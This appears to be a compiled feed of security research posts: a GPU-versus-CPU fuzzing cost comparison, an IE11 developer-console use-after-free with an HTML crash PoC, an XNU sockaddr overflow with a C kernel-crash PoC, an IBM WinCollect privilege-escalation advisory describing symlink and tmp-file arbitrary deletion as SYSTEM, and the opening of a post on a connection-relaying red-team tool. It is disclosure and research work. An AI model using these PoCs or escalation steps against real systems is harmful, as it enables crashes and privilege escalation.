Once again, I hate the cloud. It’s a pretty big ripoff for long-running compute, but of course, it can save you IT costs and allow you to dynamically spin up.

But, for funsies, let’s check the performance per dollar for people who actually buy their hardware rather than use cloud compute.

For these benchmarks I’m going to use my own server that I host in my house and purchased for fuzzing. It’s a quad socket Xeon 6252N, which means that in total it has 96 cores and 192 threads, clocking at 2.3 GHz base, turboing to 3.6 GHz. The MSRP (and price I paid) for these processors is $1788. Thus, ~$7,152 for just the processors. Throw in about $2k for a server-grade chassis + motherboard + power supplies, and then ~$5k for 768 GiB of RAM, and you get to the $14-15k mark that I paid for this server. But, we’ll simplify it a bit, we don’t need 768 GiB of RAM for our example, so we’ll figure out what we want in GPUs.

For GPUs, the Tesla T4s are $2,152 per GPU, and have 16 GiB of RAM each. Let’s just ignore all the PCI slotting, motherboards, and CPU required for a machine to host them, and we’ll just say we build the cheapest possible chassis, motherboard, PSU, and CPUs, and somehow can socket these in a $1k server. My server is about $9k for just the 4 CPUs plus $2k in chassis and motherboards, and thus that leaves us with an $8k budget for GPUs. Let’s just say we buy 4 Tesla T4s and throw them in the $1k server, and we got them for $2k each. Okay, we have a 4 Tesla T4 machine and a 4 socket Xeon 6252N server for about $9k. We’re fudging some of the numbers to give the GPUs an advantage since a $1k chassis is cheap, so we’ll just say we threw 64 GiB into the server to match the GPUs’ RAM and call it “even”.

Okay, so we have 2 theoretical systems. One with 96C/192T of Xeon 6252Ns and 64 GiB RAM, and one with 4 Tesla T4s with 64 GiB VRAM. They’re about $9k-$11k depending on what deals you can get, so we’ll say each one was $9k.

Well, how does it stack up?

I have the 4x 6252N system, so we’ll run vectorized emulation in “light blue” line mode (block coverage, byte-level permissions, uninitialized mem tracking, and no register taint tracking). This is a common mode for when I’m not fuzzing too deep on a target. Well, let’s light up those cores.

[Image: lolcores]

Sweet, we’re under 10 GiB of memory usage for the whole system, so we’re not really cheating by skimping on the memory in our theoretical 64 GiB build.

Well, we’re getting about 700 million fuzz cases per second on the whole system. Woo! That’s a shitton! That is 77k iters/second/$. Obviously this seems “lower” than what we saw before, but this is the iters/second for a one time dollar investment, not a per-hour cloud fee.

So… what do we get on the GPU? Well, they concluded with getting 8.4 million iters/sec on the cloud compute GPU. Assuming it’s close to the performance you get on bare metal (since they picked the non-preemptable GPU option), we can just multiply this number by 4 to get the iters/sec on this theoretical machine. We get 33.6 million iterations per second total, if we had 4 GPUs (assuming linear scaling and stuff, which I think is totally fair). Well… that’s 3,733 iters/second/$… or about 21x more expensive than vectorized emulation.

What gives? Well, the CPUs will definitely use more power. At 150W each you’ll be pushing 600W minimum, but I observe more in the ballpark of 1kW when running this server, including peripherals and everything else. The Tesla T4s are 70W each, totalling 280W. They would likely sit in a system that needs about 200W to run the CPU, chassis, RAM, etc, so let’s say 500W. Well, that’d be about 1/2 the wattage of the CPU-based solution. Given power is pretty cheap (especially in the US), this difference isn’t too major. I pay $0.10/kWh, thus the CPU server would cost about $0.20 per hour, and the GPU build would cost about $0.10 per hour (doubled for cooling). These are my “cloud compute” runtime costs, and thus the GPUs are still about 10x more expensive to run than the CPU solution.
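Both owned-hardware comparisons above (purchase price and power) reduce to a couple of divisions. A sketch using the round numbers from the text, where the function names and the `cooling_multiplier` parameter are made up for illustration:

```rust
/// Throughput per dollar of one-time hardware spend.
fn iters_per_purchase_dollar(iters_per_sec: f64, purchase_dollars: f64) -> f64 {
    iters_per_sec / purchase_dollars
}

/// Hourly electricity cost, with a multiplier to account for cooling.
fn hourly_power_cost(watts: f64, dollars_per_kwh: f64, cooling_multiplier: f64) -> f64 {
    watts / 1000.0 * dollars_per_kwh * cooling_multiplier
}

fn main() {
    let (cpu_rate, gpu_rate) = (700e6, 4.0 * 8.4e6); // iters/second
    let build_cost = 9_000.0; // both theoretical builds

    let cpu = iters_per_purchase_dollar(cpu_rate, build_cost);
    let gpu = iters_per_purchase_dollar(gpu_rate, build_cost);
    println!("purchase: {:.0} vs {:.0} iters/s/$ ({:.1}x)", cpu, gpu, cpu / gpu);

    let cpu_power = hourly_power_cost(1000.0, 0.10, 2.0);
    let gpu_power = hourly_power_cost(500.0, 0.10, 2.0);
    let run_ratio = (cpu_rate / cpu_power) / (gpu_rate / gpu_power);
    println!("power: ${:.2}/h vs ${:.2}/h ({:.1}x per running dollar)",
             cpu_power, gpu_power, run_ratio);
}
```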

Conclusion

As I’ve mentioned, this GPU based fuzzing stuff is incredibly cool. I can’t wait to see more. Unfortunately, some of the methodologies of the comparison aren’t very fair and thus I think the claims aren’t very compelling. It doesn’t mean the work isn’t thrilling, amazing, and incredibly hard, it just means it’s not really time yet to drop what we’re doing to invest in GPUs for fuzzing.

There’s a pretty large discrepancy in the cost effectiveness of GPUs in the cloud, and this blog ends up getting a pretty large advantage over libfuzzer for something that is really just a pricing decision by the cloud providers. When purchasing your own gear, the GPUs are about 10x more expensive than the CPUs that were used in the blog’s tests (quad-core Skylake @ $200 or so vs an NVIDIA T4 @ $2000). The cloud prices do not reflect this difference, and in the cloud, these two solutions are the same price. That being said, those are real gains. If GPUs are that much more cost effective in the cloud, then we should definitely try to use them!

Ultimately, when buying the hardware, the GPU solution is about 20x less cost effective than a CPU based solution (vectorized emulation). But even then, vectorized emulation is an emulator, and slower than native execution by a factor of 3, thus, compared to a carefully crafted, low-overhead fuzzer, the GPU solution is actually about 60x less cost effective.

But! The GPU solution (as well as vectorized emulation) allows for running closed-source binary targets in a highly efficient way, and that definitely is worth a performance loss. I’d rather be able to fuzz something at a 10x slowdown than not be able to fuzz it at all (eg. needing source)!

Hats off to everyone at Trail of Bits who worked on this. This is incredibly cool research. I hope this blog didn’t come off as harsh, it’s mainly just me recording my thoughts as I’m always chasing the best solution for fuzzing! If that means I throw away vecemu to do GPU-based fuzzing, I will do it in a heartbeat. But, that decision is a heavy one, as I would need to invest thousands of hours in GPU development and retool my whole server room! These decisions are hard for me to make, and thus, I have to be very critical of all the evidence.

I can’t wait to see more research from you all! This is incredible. You’re giving me a real run for my money, and in only 2 months of work, fucking amazing! See you soon!


Random opinions

I’ve been asked a few things about my opinion on the GPU-based fuzzing, I’ll answer them here.

Is not having syscalls a problem?

No. It’s not. It is for people who want to use the tool. But this is a research tool and is for exploring what is possible. The act of fuzzing on a GPU by running binary translated code is incredible, that’s the focus here! GPUs are Turing complete, we can definitely emulate syscalls on them if needed. It might be a lot of work, a lot of plumbing, maybe a perf hit, but it doesn’t stop it from being possible. Most of my fuzzers rely on emulating syscalls.

There’s also nothing preventing GPUs from being used to emulate a whole OS. You’d have to handle self-modifying code and virtual memory, which can get very expensive in an emulator, but with software TLBs these things can be kept manageable enough that it’s still worth doing!


Social

I’ve been streaming a lot more regularly on my Twitch! I’ve developed hypervisors for fuzzing, mutators, emulators, and just done a lot of fun fuzzing work on stream. Come on by!

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I often will post data and graphs from data as it comes in and I learn!

Crash Reproduction Series: IE Developer Console UAF

13 October 2020 at 08:50

During a DFIR investigation, using ZecOps Crash Forensics on a developer’s computer, we encountered a consistent crash on Internet Explorer 11. The TL;DR is that although this bug is not exploitable, it presents an interesting expansion of the attack surface through the Developer Consoles in browsers.

While examining the stack trace, we noticed a JavaScript engine failure. The type of the exception was a null pointer dereference, which is typically not alarming. We investigated further to understand whether this event can be exploited.

We examined the stack trace below: 

58c0cdba     mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2+0xb
584d6ebc     mshtml!CDomEventRegistrationCallback2<CDiagnosticsElementEventHelper>::OnDOMEventListenerRemoved2+0x1a
584d8a1c     mshtml!DOMEventDebug::InvokeUnregisterCallbacks+0x100
58489f85     mshtml!CListenerAry::ReleaseAndDelete+0x42
582f6d3a     mshtml!CBase::RemoveEventListenerInternal+0x75
5848a9f7     mshtml!COmWindowProxy::RemoveEventListenerInternal+0x1a
582fb8b9     mshtml!CBase::removeEventListener+0x57
587bf1a5     mshtml!COmWindowProxy::removeEventListener+0x29
57584dae     mshtml!CFastDOM::CWindow::Trampoline_removeEventListener+0xb5
57583bb3     jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x1de
574d4492     jscript9!Js::JavascriptFunction::CallFunction<1>+0x93
[...more jscript9 functions]
581b0838     jscript9!ScriptEngineBase::Execute+0x9d
580b3207     mshtml!CJScript9Holder::ExecuteCallback+0x48
580b2fd3     mshtml!CListenerDispatch::InvokeVar+0x227
57fe5ad1     mshtml!CListenerDispatch::Invoke+0x6d
58194d17     mshtml!CEventMgr::_InvokeListeners+0x1ea
58055473     mshtml!CEventMgr::_DispatchBubblePhase+0x32
584d48aa     mshtml!CEventMgr::Dispatch+0x41e
584d387d     mshtml!CEventMgr::DispatchPointerEvent+0x1b0
5835f332     mshtml!CEventMgr::DispatchClickEvent+0x2c3
5835ce15     mshtml!CElement::Fire_onclick+0x37
583baa8e     mshtml!CElement::DoClick+0xd5
[...]

and noticed that the flow that led to the crash was:

  • An onclick handler fired due to a user input
  • The onclick handler was executed
  • removeEventListener was called

The crash happened at:

mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2+0xb:

58c0cdcd 8b9004010000    mov     edx,dword ptr [eax+104h] ds:002b:00000104=????????

Relevant instructions leading to the crash:

58c0cdc7 8b411c       mov     eax, dword ptr [ecx+1Ch]
58c0cdca 8b401c       mov     eax, dword ptr [eax+1Ch]
58c0cdcd 8b9004010000 mov     edx, dword ptr [eax+104h]

Initially ecx is the “this” pointer of the called member function’s class. On the first dereference we get a zeroed region, on the second dereference we get NULL, and on the third one we crash.

Reproduction

We tried to reproduce a legit call to mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2 to see how it looks in a non-crashing scenario. We came to the conclusion that the event is called only when the IE Developer Tools window is open with the Events tab.

We found out that when the dev tools Events tab is opened, it subscribes to events for added and removed event listeners. When the dev tools window is closed, the event consumer is freed without unsubscribing, causing a use-after-free bug which results in a null dereference crash.

Summary

Tools such as the browser Developer Tools add complexity to the process at runtime and may open up additional attack surfaces.

Exploitation

Even though Use-After-Free (UAF) bugs can often be exploited for arbitrary code execution, this bug is not exploitable due to the MemGC mitigation. The freed memory block is zeroed, but it is not deallocated while other valid objects still point to it. As a result, the referenced pointer is always a NULL pointer, leading to a non-exploitable crash.
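The lifetime problem can be modelled in a few lines of Python. This is only a sketch of the pattern, not IE's code: the class names `Consumer` and `EventSource` and the key `field_104` are invented for illustration, and replacing a field with `None` merely stands in for a block that was zeroed but kept allocated.

```python
class Consumer:
    """Hypothetical stand-in for the dev tools event consumer."""

    def __init__(self):
        # Nested objects loosely mirroring the [ecx+1Ch] -> [eax+1Ch] -> [eax+104h] chain.
        self.inner = {"inner": {"field_104": "callback table"}}

    def free(self):
        # Model of a zeroed block: the region is still reachable, but its pointer is NULL.
        self.inner = {"inner": None}


class EventSource:
    """Hypothetical stand-in for the registry that notifies subscribed consumers."""

    def __init__(self):
        self.subscribers = []

    def subscribe(self, consumer):
        self.subscribers.append(consumer)

    def notify_listener_removed(self):
        outcomes = []
        for consumer in self.subscribers:
            try:
                outcomes.append(consumer.inner["inner"]["field_104"])
            except TypeError:
                # Subscripting None is this model's equivalent of the NULL dereference.
                outcomes.append("null dereference")
        return outcomes


source = EventSource()
devtools = Consumer()
source.subscribe(devtools)
while_open = source.notify_listener_removed()

devtools.free()  # dev tools closed: consumer released, subscription left in place
after_close = source.notify_listener_removed()

print(while_open)
print(after_close)
```

In this model the stale subscription is still called after the consumer is released, but because the released region only ever yields a null pointer, the outcome is a clean fault rather than access to attacker-influenced memory.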

Responsible Disclosure

We reported this issue to Microsoft, which decided not to fix it.

POC

Below is a small HTML page that demonstrates the concept and leads to a crash.
Tested IE11 version: 11.592.18362.0
Update Versions: 11.0.170 (KB4534251)

<!DOCTYPE html>
<html>
<body>
<pre>
1. Open dev tools
2. Go to Events tab
3. Close dev tools
4. Click on Enable
</pre>
<button onclick="setHandler()">Enable</button>
<button onclick="removeHandler()">Disable</button>
<p id="demo"></p>
<script>
function myFunction() {
    document.getElementById("demo").innerHTML = Math.random();
}
function setHandler() {
    document.body.addEventListener("mousemove", myFunction);
}
function removeHandler() {
    document.body.removeEventListener("mousemove", myFunction);
}
</script>
</body>
</html>

Interested in researching browser & OS bugs daily?

ZecOps is expanding. We’re looking for additional researchers to join ZecOps Research Team. If you’re interested, send us a note at [email protected]


ZecOps for Mobile DFIR 2.0 – Now Supporting iOS *AND* Android

8 October 2020 at 10:00

ZecOps is excited to announce the release of ZecOps for Mobile 2.0, which includes full support for Android. With this release, ZecOps has extended its best-in-class automatic digital forensics capabilities to the two most widespread and important mobile operating systems in the world, iOS and Android.

We see it in the news every day: sophisticated threat actors can bypass all existing security defenses. Even so, attackers make mistakes. These mistakes lead to sudden reboots, crashes, appearances in logs / OS telemetry, bugs, errors, battery loss, and other “unexplained” anomalies. ZecOps for Mobile analyzes the associated events against databases of attack techniques, common weaknesses (CWEs), and common vulnerabilities (CVEs). ZecOps’s core technology uses machine learning for insights, correlation, and identifying anomalous behavior that indicates 0-day attacks. Following a quick investigation, ZecOps produces a detailed assessment of if, when, and how a mobile device has been compromised.

World-leading governments, defense agencies, enterprises, and VIPs rely on ZecOps to automate their advanced investigations, greatly improving their threat intelligence, threat detection, APT hunting, and risk & compromise assessment capabilities. With support for Android, ZecOps can now extend this threat intelligence across an entire organization’s mobile footprint.

Supported versions:

  • Android 8 and above, up to the latest release
  • iOS 10 and above, up to the latest release

Supported HW Models:

  • All device models are supported on both Android and iOS.

ZecOps provides the most thorough operating system telemetry analysis as part of its advanced digital forensics. By focusing on the trails that hackers leave (“Attackers’ Mistakes”), ZecOps can provide sophisticated security organizations with critical information on the attackers’ tools, advanced persistent threats, and even discovery of attacks leveraging zero-day vulnerabilities.

.NET Grey Box Approach: Source Code Review & Dynamic Analysis

By: voidsec
7 October 2020 at 13:19

Following a recent engagement, I had the opportunity to check and verify some possible vulnerabilities in an ASP.NET application. Although this is neither the most technically deep nor the most innovative blog post you could find on the net, I have decided to post it anyway in order to explain the methodology I adopt to verify possible vulnerabilities. […]

The post .NET Grey Box Approach: Source Code Review & Dynamic Analysis appeared first on VoidSec.

From a comment to a CVE: Content filter strikes again!

17 September 2020 at 02:44

0x0- Opening

In the past few years XNU has had a few vulnerabilities in newly added or changed code areas (extra_recipe, kq double release) and in the content filter area (bug collision uaf, silent patched uaf). So it is no surprise that the combination of newly added code and a complex area (content filter), together with a funny comment, caught our attention.

0x1- Discovery story

Upon a closer look at the newly added xnu source of Darwin 19 you might notice a strange comment in content_filter.c:

/*
 *	TO DO LIST
 *
 *	SOONER:
 *
 *	Deal with OOB
 *
 *	LATER:
 *
 *	If support datagram, enqueue control and address mbufs as well
 */

Is this comment referring to OOB read/write issues? Probably not, but it won’t hurt to run a quick search for those. So we use the magic tool CMD+F to search for memcpy calls, and in less than two minutes we find the following.

0x2- The bug.

The bug is in the newly updated cfil_sock_attach function, which is easily reached from tcp_usr_connect and tcp_usr_connectx with controlled variables:

errno_t
cfil_sock_attach(struct socket *so, struct sockaddr *local, struct sockaddr *remote, int dir) // (Part A)
{
	errno_t error = 0;
	uint32_t filter_control_unit;

	socket_lock_assert_owned(so);

	/* Limit ourselves to TCP that are not MPTCP subflows */
	if ((so->so_proto->pr_domain->dom_family != PF_INET &&
	    so->so_proto->pr_domain->dom_family != PF_INET6) ||
	    so->so_proto->pr_type != SOCK_STREAM ||
	    so->so_proto->pr_protocol != IPPROTO_TCP ||
	    (so->so_flags & SOF_MP_SUBFLOW) != 0 ||
	    (so->so_flags1 & SOF1_CONTENT_FILTER_SKIP) != 0) {
		goto done;
	}

	filter_control_unit = necp_socket_get_content_filter_control_unit(so);
	if (filter_control_unit == 0) {
		goto done;
	}

	if (filter_control_unit == NECP_FILTER_UNIT_NO_FILTER) {
		goto done;
	}
	if ((filter_control_unit & NECP_MASK_USERSPACE_ONLY) != 0) {
		OSIncrementAtomic(&cfil_stats.cfs_sock_userspace_only);
		goto done;
	}
	if (cfil_active_count == 0) {
		OSIncrementAtomic(&cfil_stats.cfs_sock_attach_in_vain);
		goto done;
	}
	if (so->so_cfil != NULL) {
		OSIncrementAtomic(&cfil_stats.cfs_sock_attach_already);
		CFIL_LOG(LOG_ERR, "already attached");
	} else {
		cfil_info_alloc(so, NULL);
		if (so->so_cfil == NULL) {
			error = ENOMEM;
			OSIncrementAtomic(&cfil_stats.cfs_sock_attach_no_mem);
			goto done;
		}
		so->so_cfil->cfi_dir = dir;
	}
	if (cfil_info_attach_unit(so, filter_control_unit, so->so_cfil) == 0) {
		CFIL_LOG(LOG_ERR, "cfil_info_attach_unit(%u) failed",
		    filter_control_unit);
		OSIncrementAtomic(&cfil_stats.cfs_sock_attach_failed);
		goto done;
	}
	CFIL_LOG(LOG_INFO, "so %llx filter_control_unit %u sockID %llx",
	    (uint64_t)VM_KERNEL_ADDRPERM(so),
	    filter_control_unit, so->so_cfil->cfi_sock_id);

	so->so_flags |= SOF_CONTENT_FILTER;
	OSIncrementAtomic(&cfil_stats.cfs_sock_attached);

	/* Hold a reference on the socket */
	so->so_usecount++;

	/*
	 * Save passed addresses for attach event msg (in case resend
	 * is needed.
	 */
	if (remote != NULL) {
		memcpy(&so->so_cfil->cfi_so_attach_faddr, remote, remote->sa_len); // Part B
	}
	if (local != NULL) {
		memcpy(&so->so_cfil->cfi_so_attach_laddr, local, local->sa_len); // Part C
	}

	error = cfil_dispatch_attach_event(so, so->so_cfil, 0, dir);
	/* We can recover from flow control or out of memory errors */
	if (error == ENOBUFS || error == ENOMEM) {
		error = 0;
	} else if (error != 0) {
		goto done;
	}

	CFIL_INFO_VERIFY(so->so_cfil);
done:
	return error;
}

We can see that in (Part A) the function receives two sockaddr parameters (local and remote), both of which are user controlled. It then uses their sa_len member (remote in (Part B) and local in (Part C)) as the length when copying the data into cfi_so_attach_faddr and cfi_so_attach_laddr, respectively. Parts (A), (B) and (C) were all the result of new changes in XNU.

So what’s the problem? There is no check on sa_len, which can be set as high as 255 and is then used in a memcpy that copies data into a union sockaddr_in_4_6, a 28-byte structure, resulting in a buffer overflow.
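The arithmetic of the overflow can be illustrated with a small Python model. It is a sketch under stated assumptions, not kernel code: the function names are invented, a `bytearray` stands in for the 28-byte destination, and the first byte of the source buffer plays the role of `sa_len` as in a BSD-style sockaddr.

```python
SOCKADDR_IN_4_6_SIZE = 28  # size of union sockaddr_in_4_6, as stated in the text


def unchecked_overflow(src: bytes, dst_size: int = SOCKADDR_IN_4_6_SIZE) -> int:
    """Bytes that a memcpy driven only by sa_len would write past the destination."""
    sa_len = src[0]  # BSD sockaddr: the first byte is sa_len
    return max(0, sa_len - dst_size)


def checked_copy(dst: bytearray, src: bytes) -> bool:
    """Copy only when sa_len fits into the destination (hypothetical guard)."""
    sa_len = src[0]
    if sa_len > len(dst) or sa_len > len(src):
        return False
    dst[:sa_len] = src[:sa_len]
    return True


evil = bytes([255, 2]) + b"A" * 254   # sa_len = 255, sa_family = 2 (AF_INET)
good = bytes([16, 2]) + bytes(14)     # an ordinary 16-byte sockaddr_in

print(unchecked_overflow(evil))
print(checked_copy(bytearray(SOCKADDR_IN_4_6_SIZE), evil))
print(checked_copy(bytearray(SOCKADDR_IN_4_6_SIZE), good))
```

With `sa_len` at its maximum of 255, an unchecked copy would run 227 bytes past a 28-byte destination, while a length check rejects the oversized address and still accepts a normal one.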

The PoC below is almost identical to Ian Beer’s mptcp PoC, with two changes. It has a prerequisite for reaching the vulnerable area: to trigger the vulnerability we need either an MDM-enrolled device with an NECP policy, or a socket attached to a valid filter_control_unit. One way to do the latter is to create one with cfilutil and then manually write it to kernel memory using a kernel debugger.

After running the POC, it will crash the kernel:

#include <sys/socket.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <unistd.h>

int main(int argc, const char *argv[]) {

	int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (sock < 0) {
		printf("socket failed\n");
		return -1;
	}
	printf("got socket: %d\n", sock);

	/* Destination address whose sa_len (255) exceeds the 28-byte kernel buffer */
	struct sockaddr *sockaddr_dst = malloc(256);
	memset(sockaddr_dst, 'A', 256);
	sockaddr_dst->sa_len = 255;
	sockaddr_dst->sa_family = AF_INET;

	sa_endpoints_t eps = {0};
	eps.sae_srcif = 0;
	eps.sae_srcaddr = NULL;
	eps.sae_srcaddrlen = 0;
	eps.sae_dstaddr = sockaddr_dst;
	eps.sae_dstaddrlen = 255;

	/* connectx() reaches cfil_sock_attach with the oversized remote address */
	int err = connectx(sock, &eps, SAE_ASSOCID_ANY, 0, NULL, 0, NULL, NULL);
	printf("err: %d\n", err);
	close(sock);
	return 0;
}

0x3- Patch

The patch for the issue is interesting too, because while the source code (iOS 13.6 / macOS 10.15.6) provides this patch:

	if (remote != NULL && (remote->sa_len <= sizeof(union sockaddr_in_4_6))) {
		memcpy(&so->so_cfil->cfi_so_attach_faddr, remote, remote->sa_len);
	}
	if (local != NULL && (local->sa_len <= sizeof(union sockaddr_in_4_6))) {
		memcpy(&so->so_cfil->cfi_so_attach_laddr, local, local->sa_len);
	}

The disassembly shows something else…

Here is a picture of the vulnerable part in macOS 10.15.1 compiled kernel (before the issue was reported):

Here is a picture of the vulnerable part in macOS 10.15.6 compiled kernel (after the issue was reported):

The panic call with the memcpy_chk is gone alongside the patch!

Did the original developer know this function was vulnerable and place it there as a placeholder until a proper patch? Your guess is as good as ours.

Also note that the call to memcpy_chk before the real_mode_bootstrap_end (which is a wrapper around memcpy) is what kept this issue from being exploitable.

0x4- What can we take from this?

  1. Read comments; they might give us valuable information.
  2. Newly added code is often buggy.
  3. Content filter code is complex and tricky.
  4. Together with Pangu’s recent blog post and Ian Beer’s mptcp bug, this shows that sockaddr->sa_len has already caused multiple issues and should be audited more carefully.

0x5- Attacks in the wild?

This issue is not dangerous. During our investigation of this bug, ZecOps checked its targeted threat intelligence database and saw no active attacks associated with this issue. We still advise updating to the latest version to receive all other updates.


IBM QRadar Wincollect Escalation of Privilege (CVE-2020-4485 & CVE-2020-4486)

By: admin
11 September 2020 at 12:57

Summary

Assigned CVE: CVE-2020-4485 and CVE-2020-4486 have been assigned and RedyOps Labs has been publicly acknowledged by the vendor.

Known to Neurosoft’s RedyOps Labs since: 13/05/2020

Exploit Code: N/A

Vendor’s Advisory: https://www.ibm.com/support/pages/node/6257885

An Elevation of Privilege (EoP) vulnerability exists in IBM QRadar WinCollect 7.2.0 – 7.2.9. The vulnerability gives a low privileged user the ability to delete any file on the system and to disable the WinCollect service. This arbitrary delete can be leveraged to gain access as NT AUTHORITY\SYSTEM. During the exploitation, the attacker disables the WinCollect service.

Description

There are two distinct root causes which can lead to the same issue (arbitrary delete):
After the installation of the WinCollect, the installer remains under the folder c:\Windows\Installer . Any user with low privileges can run the installer with the following command:

msiexec /fa c:\Windows\Installer\****.msi

Although the WinCollect installer will eventually fail when executed by a low privileged user, it creates log files under the user’s Temp folder.

At some point, the installer will try to delete those log files as SYSTEM. Because the user controls the files in their Temp folder (C:\Users\username\AppData\Local\Temp), they can create a symlink targeting any file on the system. When the installer tries to delete these files, it follows the symlink and performs the delete as SYSTEM.

Even if the symlinks are mitigated in the future by Microsoft, an attacker can achieve the arbitrary delete by editing the file ~xxxx.tmp .

The file C:\Users\username\AppData\Local\Temp\~xxxx.tmp, where xxxx is a random hex value, ends with the lines:

[SearchRepalceTargetBackupFiles]
C:\Program Files\IBM\WinCollect\config\CmdLine.txt=C:\Users\attacker\AppData\Local\Temp\_isFD30
C:\Program Files\IBM\WinCollect\config\logconfig_template.xml=C:\Users\attacker\AppData\Local\Temp\_isFD8F
C:\Program Files\IBM\WinCollect\templates\tmplt_AgentCore.xml=C:\Users\attacker\AppData\Local\Temp\_isFDAF

An attacker can edit these lines and point them at the files they want to delete. For example:

[SearchRepalceTargetBackupFiles]
C:\Program Files\IBM\WinCollect\config\CmdLine.txt=C:\windows\win.ini
C:\Program Files\IBM\WinCollect\config\logconfig_template.xml=C:\Users\Admin\whatever.exe
C:\Program Files\IBM\WinCollect\templates\tmplt_AgentCore.xml=C:\Users\anotheruser\logs.txt

When we cancel the installer, these files will be deleted as SYSTEM.

As a bonus, during this process, the wincollect service will stop and will remain stopped, until we cancel the operation.

Exploitation

No special program is needed to exploit the issue.

In the following paragraph, a step by step explanation of the Video PoC is provided.

Please note that the part attributable to the IBM QRadar WinCollect vulnerability ends once we delete the WER folder (or any other file/folder you want to delete).

Using an arbitrary delete to escalate to SYSTEM is unrelated to this vulnerability; it is an MS Windows issue. This technique has been described by Jonas L in his blogpost https://secret.club/2020/04/23/directory-deletion-shell.html

The delete.exe is an implementation of this technique, which can be found in my github repo https://github.com/DimopoulosElias/Primitives

Video PoC Step By Step


00:00-00:11: We present the environment. We are low privileged users and the installer file we are going to use is 11ec43.msi. This file belongs to IBM and is the installer of the WinCollect agent.

00:11-00:22: As low privileged users, we run the installer. At the end of this time frame (00:22) the WinCollect service has stopped. We can stay in this state as long as we want and perform any actions we want while the WinCollect service is disabled (CVE-2020-4485).

00:22-00:58: We are going to use the technique presented by Jonas L in order to leverage the arbitrary delete and gain access as SYSTEM. To achieve this, we need to delete the folder C:\ProgramData\Microsoft\Windows\WER, which cannot be deleted by a low privileged user. However, some sub-folders can be deleted. In this time frame, we delete the sub-folders we are able to, without any exploitation.

00:58-02:42: By exploiting CVE-2020-4486, we delete the remaining files and sub-folders from the WER folder. A low privileged user would not be able to delete those files/folders, as we showed in the previous time frame. The $INDEX_ALLOCATION is used in order to delete a folder instead of a file.

02:42-03:58: We run the exploitation procedure one more time, in order to delete the C:\ProgramData\Microsoft\Windows\WER folder. At this point, the use of CVE-2020-4486 ends. The rest of the video presents the use of this primitive in order to escalate to SYSTEM and is unrelated to the IBM WinCollect issues.

03:58-end: Now that we have deleted the WER folder, we use https://github.com/DimopoulosElias/Primitives in order to become SYSTEM. Again, this has nothing to do with the IBM vulnerabilities. It’s a primitive which allows us to use any (or almost any) arbitrary delete in order to escalate to SYSTEM.

We will leave the escalation with the use of symlinks as an exercise for you 🙂 .

Resources

GitHub

You can find our exploits code in our GitHub at https://github.com/RedyOpsResearchLabs/


The post IBM QRadar Wincollect Escalation of Privilege (CVE-2020-4485 & CVE-2020-4486) appeared first on REDYOPS Labs.

StreamDivert: Relaying (specific) network connections

10 September 2020 at 08:14

Author: Jelle Vergeer

The first part of this blog will be the story of how this tool found its way into existence, the problems we faced and the thought process followed. The second part will be a more technical deep dive into the tool itself, how to use it, and how it works.

Storytime

About a year and a half ago I did an awesome Red Team-like project. The project boils down to the following:

We were able to compromise a server in the DMZ region of the client’s network by exploiting a flaw in the authentication mechanism of the software that was used to manage that machine (awesome!). This machine hosted the server part of another piece of software. This piece of software basically listened on a specific port and clients connected to it: a basic client-server model. Unfortunately, we were not able to directly reach or compromise other interesting hosts in the network. We had a closer look at that service running on the machine, dumped the network traffic, and inspected it. We came to the conclusion that there were actual high-value systems in the client’s network connecting to this service! So what now? I started to reverse engineer the software and came to the conclusion that the server could send commands to clients, which the clients executed. Unfortunately, the server did not have any UI component (it was just a service), or anything else that would let us send our own custom commands to clients. Bummer! We furthermore had the restriction that we couldn’t stop or halt the service. Stopping the service meant all the clients would get disconnected, and this would cause quite an outage, resulting in us being detected (boo). So, to sum up:

  • We compromised a server, which hosts a server component to which clients connect.
  • Some of these clients are interesting, and in scope of the client’s network.
  • The server software can send commands to clients which clients execute (code execution).
  • The server has no UI.
  • We can’t kill or restart the service.

What now? Brainstorming resulted in the following:

  • Inject a DLL into the server to send custom commands to a specific set of clients.
  • Inject a DLL into the server and hook socket functions, and do some logic there?
  • Research if there is any Windows Firewall functionality to redirect specific incoming connections.
  • Look into the Windows Filtering Platform (WFP) and write a (kernel) driver to hook specific connections.

The first two options quickly fell off: we were too scared of messing up the injected DLL and actually crashing the server. The Windows Firewall did not seem to have any capabilities for redirecting specific connections from a source IP. Due to some restrictions on the ports used, the netsh redirect trick would not work for us. This left us with researching a network driver, and the discovery of an awesome open-source project: WinDivert (thanks to DiabloHorn for the inspiration). WinDivert is basically a userland library that communicates with a kernel driver: the driver intercepts network packets and hands them to the userland application, which processes and modifies them and then reinjects them into the network stack. This sounds promising! We can develop a standalone userland application that depends on a well-written and tested driver to modify and re-inject packets. If our userland application crashes, no harm is done, and the network traffic continues with the normal flow. From there on, a new tool was born: StreamDivert.

StreamDivert

StreamDivert is a tool to man-in-the-middle or relay incoming and outgoing network connections on a system. It has the ability to, for example, relay all incoming SMB connections to port 445 to another server, or only relay specific incoming SMB connections from a specific set of source IPs to another server. Summed up, StreamDivert is able to:

  • Relay all incoming connections to a specific port to another destination.
  • Relay incoming connections from a specific source IP to a port to another destination.
  • Relay incoming connections to a SOCKS(4a/5) server.
  • Relay all outgoing connections to a specific port to another destination.
  • Relay outgoing connections to a specific IP and port to another destination.
  • Handle TCP, UDP and ICMP traffic over IPv4 and IPv6.
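The rule selection implied by this list can be sketched in Python. This is not StreamDivert's configuration format or code: `RelayRule`, `pick_target` and the precedence of source-specific rules over catch-all rules are assumptions made for illustration, and the addresses are placeholders.

```python
import ipaddress
from dataclasses import dataclass
from typing import Optional, Tuple


@dataclass(frozen=True)
class RelayRule:
    """Hypothetical inbound relay rule."""
    local_port: int
    source: Optional[str]        # None = any source, otherwise an IP or CIDR range
    target: Tuple[str, int]      # (host, port) the connection is relayed to


def pick_target(rules, src_ip, dst_port):
    """Return the relay target for a connection, or None to leave it untouched.

    Assumed precedence: a source-specific rule wins over a catch-all rule.
    """
    addr = ipaddress.ip_address(src_ip)
    fallback = None
    for rule in rules:
        if rule.local_port != dst_port:
            continue
        if rule.source is None:
            fallback = fallback or rule.target
        elif addr in ipaddress.ip_network(rule.source, strict=False):
            return rule.target
    return fallback


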